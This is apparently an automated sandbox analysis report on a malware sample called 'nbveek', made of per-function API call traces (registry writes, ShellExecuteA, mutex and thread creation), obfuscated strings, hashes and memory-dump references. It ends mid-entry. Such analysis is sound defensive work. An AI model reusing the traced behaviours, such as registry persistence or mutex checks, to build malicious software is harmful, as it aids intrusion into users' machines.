                                                                                                                                                                                      • Instruction ID: 47e831769a8261291177f8b6d18eb8544d153aeace3d56fb5c3250681ef71ba9
                                                                                                                                                                                      • Opcode Fuzzy Hash: 60fffa755a2c1953d2e26cb53f4d81ef429a723a59b3a59f77b1aa8f82a12f30
                                                                                                                                                                                      • Instruction Fuzzy Hash: E6413DB5900305AFDB28EFB5E8449AFBBF9EF88200B00852EE556D3650E734A845CF61
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0117D061
                                                                                                                                                                                      • CreateDirectoryA.KERNELBASE(00000000), ref: 0117D193
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 0117D2A8
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile$CreateDirectory
                                                                                                                                                                                      • String ID: Xv==
                                                                                                                                                                                      • API String ID: 1875963930-1291970588
                                                                                                                                                                                      • Opcode ID: 51e0f6998d89cf1dad215147af6f6e3581710dd9231aaf3a0db738178509c9ce
                                                                                                                                                                                      • Instruction ID: 780f37dfa6e0d104ef2a851cd4d505a92542d036d369600097d18d776c108409
                                                                                                                                                                                      • Opcode Fuzzy Hash: 51e0f6998d89cf1dad215147af6f6e3581710dd9231aaf3a0db738178509c9ce
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8B325871A000488BEF1CDBB8DD8979DBF72AF86318F64C258E805A73D5DB359AC18B51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                      • String ID: 853321935212$ZOu=
                                                                                                                                                                                      • API String ID: 3472027048-2861891003
                                                                                                                                                                                      • Opcode ID: 6874fd645d568afdf5e517b20442670f18ccd35a9868225147a26ea24a3a4849
                                                                                                                                                                                      • Instruction ID: 28f7ec591a1b3712d4cd34fb247dc55dc86c039303060d7c5d403d72464cfaf8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6874fd645d568afdf5e517b20442670f18ccd35a9868225147a26ea24a3a4849
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7051F3316041499BEB0CFF38CD9579C7E62AB8A314F64C20CF814973C4DB3599848F92
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 01173D2C
                                                                                                                                                                                        • Part of subcall function 01186D98: EnterCriticalSection.KERNEL32(011A9708,?,?,01173D31,011AC468,0119D8E0), ref: 01186DA2
                                                                                                                                                                                        • Part of subcall function 01186D98: LeaveCriticalSection.KERNEL32(011A9708,?,01173D31,011AC468,0119D8E0), ref: 01186DD5
                                                                                                                                                                                        • Part of subcall function 01186D98: RtlWakeAllConditionVariable.NTDLL ref: 01186E4C
                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,01173B10,011AC418,00000000,00000000), ref: 01173D91
                                                                                                                                                                                      • Sleep.KERNELBASE(000003E8,?,?,?,?,?,?,?,?,?,?,000000FF,A875633B), ref: 01173D9C
                                                                                                                                                                                        • Part of subcall function 01186DE2: EnterCriticalSection.KERNEL32(011A9708,?,?,?,01173CC0,011AC468,A875633B,?,00000000,011984B8,000000FF), ref: 01186DED
                                                                                                                                                                                        • Part of subcall function 01186DE2: LeaveCriticalSection.KERNEL32(011A9708,?,?,?,01173CC0,011AC468,A875633B,?,00000000,011984B8,000000FF), ref: 01186E2A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CriticalSection$EnterLeave$ConditionCreateInit_thread_footerSleepThreadVariableWake
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3071482907-0
                                                                                                                                                                                      • Opcode ID: 0a546d37e8d48728df6f487da660da3c00f600a1c47843e1115603dbc6cf84c7
                                                                                                                                                                                      • Instruction ID: 1b07150fc1c56c82bec50f1078b5df18799e055bf171c46468b7fad9cd5f9cff
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0a546d37e8d48728df6f487da660da3c00f600a1c47843e1115603dbc6cf84c7
                                                                                                                                                                                      • Instruction Fuzzy Hash: 7551CF702102489BEB2CDF28D885BAD7FB1FB55714FA48628F825873C5C77998C08BA5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,A875633B,A875633B), ref: 01172D8C
                                                                                                                                                                                      • RegQueryValueExA.KERNELBASE(A875633B,?,00000000,00000000,?,00000400,?,?,00000000,00000001,A875633B,A875633B), ref: 01172DBA
                                                                                                                                                                                      • RegCloseKey.KERNELBASE(A875633B,?,?,00000000,00000001,A875633B,A875633B), ref: 01172DC6
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3677997916-0
                                                                                                                                                                                      • Opcode ID: 2822437f7db3db84a5804e24bface56062eca5282be20704ad2610487ddb8b3f
                                                                                                                                                                                      • Instruction ID: b353ec15dfc7f9c18c64ec197e5e1da3e6a5a7b2013c281b95c3b986b0aaa3d0
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2822437f7db3db84a5804e24bface56062eca5282be20704ad2610487ddb8b3f
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6C41B1B1600119ABEB28CF28CC44BEDBBB9FB45304F148669E91597280DB759A85CF94
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 01173990: ShellExecuteA.SHELL32(00000000,01173BAD,A875633B,?,00000000,00000000), ref: 01173A32
                                                                                                                                                                                      • Sleep.KERNELBASE(000003E8), ref: 01174149
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: ExecuteShellSleep
                                                                                                                                                                                      • String ID: LXml$YXVp
                                                                                                                                                                                      • API String ID: 4194306370-2436158400
                                                                                                                                                                                      • Opcode ID: ee630908d0e5c4e4f25260b7e3bc0759c1b3e06a66a00acf611fe67e58f82143
                                                                                                                                                                                      • Instruction ID: eeba8e34279c8a7589771c57ab462ae8f8a9a3b2f11a3c2996cef78eb49c995e
                                                                                                                                                                                      • Opcode Fuzzy Hash: ee630908d0e5c4e4f25260b7e3bc0759c1b3e06a66a00acf611fe67e58f82143
                                                                                                                                                                                      • Instruction Fuzzy Hash: 88312470B00249ABDB0CFB78DD5675DBB72EB52318F64825CE8109B3C1DB365A408BD2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,000F003F,00000001), ref: 01172ED3
                                                                                                                                                                                      • RegSetValueExA.KERNELBASE(80000001,?,00000000,00000002,?,?), ref: 01172F01
                                                                                                                                                                                      • RegCloseKey.KERNELBASE(80000001), ref: 01172F0A
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CloseOpenValue
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 779948276-0
                                                                                                                                                                                      • Opcode ID: 0582f5dc7ad888cc0bd6f21124fc436b93c07b6cb539708d41f7a5902b9bc01d
                                                                                                                                                                                      • Instruction ID: 0981bd0909c17b7a2791abc9978e12af1ade1fa9ef6c38c2f5554c2bb0a89dc7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 0582f5dc7ad888cc0bd6f21124fc436b93c07b6cb539708d41f7a5902b9bc01d
                                                                                                                                                                                      • Instruction Fuzzy Hash: C1319C70210108ABEB1CDF28CC95BAD7B72EB45354FA08218F91597385D775D9C18B91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • _free.LIBCMT ref: 01193CD1
                                                                                                                                                                                      • _free.LIBCMT ref: 01193D27
                                                                                                                                                                                        • Part of subcall function 01193B03: _free.LIBCMT ref: 01193B5B
                                                                                                                                                                                        • Part of subcall function 01193B03: GetTimeZoneInformation.KERNELBASE(?,00000000,00000000,00000000,?,011A2620), ref: 01193B6D
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free$InformationTimeZone
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 597776487-0
                                                                                                                                                                                      • Opcode ID: 4877c4d6b241f548468b3e20e59b083167d69b7605d610cb5bcf02abcaa48de4
                                                                                                                                                                                      • Instruction ID: 6ced887122ab69f769bbdb1b3c2ee3edbe2af7c8636f406ace09968be2ad8d08
                                                                                                                                                                                      • Opcode Fuzzy Hash: 4877c4d6b241f548468b3e20e59b083167d69b7605d610cb5bcf02abcaa48de4
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75215B72C1462AA6DF3DA77A9D409EE7B78EB51334F010256D875A3180EF704D81CA50
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • Sleep.KERNELBASE(0000C350,A875633B), ref: 0118547B
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Sleep
                                                                                                                                                                                      • String ID: YYDq3zXb2vx $fv==
                                                                                                                                                                                      • API String ID: 3472027048-1493817673
                                                                                                                                                                                      • Opcode ID: 8685352d7207416a1048023240e7e3b534a8ac1d559afff3f895c1e0a189af0a
                                                                                                                                                                                      • Instruction ID: ee0a3ed127f588d3494984bd692f74cf928b827d9631d4fa074a31e29b5d47f8
                                                                                                                                                                                      • Opcode Fuzzy Hash: 8685352d7207416a1048023240e7e3b534a8ac1d559afff3f895c1e0a189af0a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 9601A276E44604ABC708BB6CDD02B6DBBB5EB15A24F84475DD821673C0EB711A1047D2
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateThread.KERNELBASE ref: 01185506
                                                                                                                                                                                      • CreateThread.KERNELBASE ref: 01185517
                                                                                                                                                                                      • Sleep.KERNELBASE(00007530,?,01185573), ref: 01185525
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateThread$Sleep
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 422425972-0
                                                                                                                                                                                      • Opcode ID: c886b1578fc1135e974739ec33fb6fb4bae521c98653cae1cdf0728ec6b88286
                                                                                                                                                                                      • Instruction ID: d821267de03bfe45a9455d13244228213d97c76c53cc2b66af91080804c07d9a
                                                                                                                                                                                      • Opcode Fuzzy Hash: c886b1578fc1135e974739ec33fb6fb4bae521c98653cae1cdf0728ec6b88286
                                                                                                                                                                                      • Instruction Fuzzy Hash: 75D0C931BD9324B6F1B862555C03F493A169709F52F755052B71C7F1C017C038404FAE
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,A875633B,00000000,?), ref: 0117587A
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FolderPath
                                                                                                                                                                                      • String ID: Xv==
                                                                                                                                                                                      • API String ID: 1514166925-1291970588
                                                                                                                                                                                      • Opcode ID: 1281c4a2d12534fb90e4ef441ff416a6519c78c2d35bebedbb68388904e8c092
                                                                                                                                                                                      • Instruction ID: bea2b612b2ceec83351da31a7ff7fa55e5300b5a18d4e6b1e4ce58b65a8eb708
                                                                                                                                                                                      • Opcode Fuzzy Hash: 1281c4a2d12534fb90e4ef441ff416a6519c78c2d35bebedbb68388904e8c092
                                                                                                                                                                                      • Instruction Fuzzy Hash: 25412471A001189BEB2CEB28CC45BEDBBB5EB46714F1082DCD809A7381EB355B84CF91
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7e37b943336b77543c1950434e599e5fdfce7b580fe221170d09c39232cb239b
                                                                                                                                                                                      • Instruction ID: ae1b9be73c20dfd41888e41bc230a9b14e729243748c0e4b093d6ab3095ecc8a
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e37b943336b77543c1950434e599e5fdfce7b580fe221170d09c39232cb239b
                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E212572805209BBEB19BFA8AC42FAE3769EF41339F158311F9356B1C0D77099018BA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • FileTimeToSystemTime.KERNEL32(00000000,?,?,?,?,0118AF05,?,?,00000000,00000000), ref: 0118AFFE
                                                                                                                                                                                      • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?,?,?,?,0118AF05,?,?,00000000,00000000), ref: 0118B012
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: Time$System$FileLocalSpecific
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1707611234-0
                                                                                                                                                                                      • Opcode ID: 107707314eaaf599d8adce3dff8e864e731e2241914539db275f52373a0e257a
                                                                                                                                                                                      • Instruction ID: ff717d62d2364b8a7bad599541059178dab982b6fa22b6cbaa72cfb9e2a83025
                                                                                                                                                                                      • Opcode Fuzzy Hash: 107707314eaaf599d8adce3dff8e864e731e2241914539db275f52373a0e257a
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4811FE7290010DABDB19EF95C984EDF77BCAF08224F508266E522E3180EB34EA45CF65
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • CreateMutexW.KERNELBASE(00000000,00000000,?,011A918C,A875633B,?,00000000,00000000), ref: 01177E51
                                                                                                                                                                                      • GetLastError.KERNEL32(?,00000000,00000000), ref: 01177E57
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: CreateErrorLastMutex
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 1925916568-0
                                                                                                                                                                                      • Opcode ID: 6aead20f65396826e76b21c396dbd88d2e5826d4b0277d70b72855f58ce1a1ec
                                                                                                                                                                                      • Instruction ID: c971491ca0e59f12885d7a74d3944475457923e16a284c3beffb9ad637f2412b
                                                                                                                                                                                      • Opcode Fuzzy Hash: 6aead20f65396826e76b21c396dbd88d2e5826d4b0277d70b72855f58ce1a1ec
                                                                                                                                                                                      • Instruction Fuzzy Hash: FB01B570D04218EBDB18DFA5CC49FAEBBB9EF04710F544529E525E3680DB7059408BA1
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: _free
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 269201875-0
                                                                                                                                                                                      • Opcode ID: cc11af885cb0d1e82d60ef4426507fba1b44caf748b1f0f249319c9d0585a5b2
                                                                                                                                                                                      • Instruction ID: 512f7a6a2b7a8a4e96cf0733e49344068e5d73be4171245c1d5af767d2ea1910
                                                                                                                                                                                      • Opcode Fuzzy Hash: cc11af885cb0d1e82d60ef4426507fba1b44caf748b1f0f249319c9d0585a5b2
                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E0E52290D91691EA2F723E7C0026A3B845F8223CF11C326E834C60D8DF2144828D6B
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • GetFileAttributesA.KERNELBASE(00000000), ref: 01176EA3
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 0000000F.00000002.829313641.0000000001171000.00000020.00000001.01000000.00000009.sdmp, Offset: 01170000, based on PE: true
                                                                                                                                                                                      • Associated: 0000000F.00000002.828961871.0000000001170000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.835389285.000000000119E000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836084072.00000000011A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      • Associated: 0000000F.00000002.836121339.00000000011AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_15_2_1170000_nbveek.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                                      • Opcode ID: 2cab172756af0c72275bde377b76f196a89affce13a70a09d3f8e5004b176d96
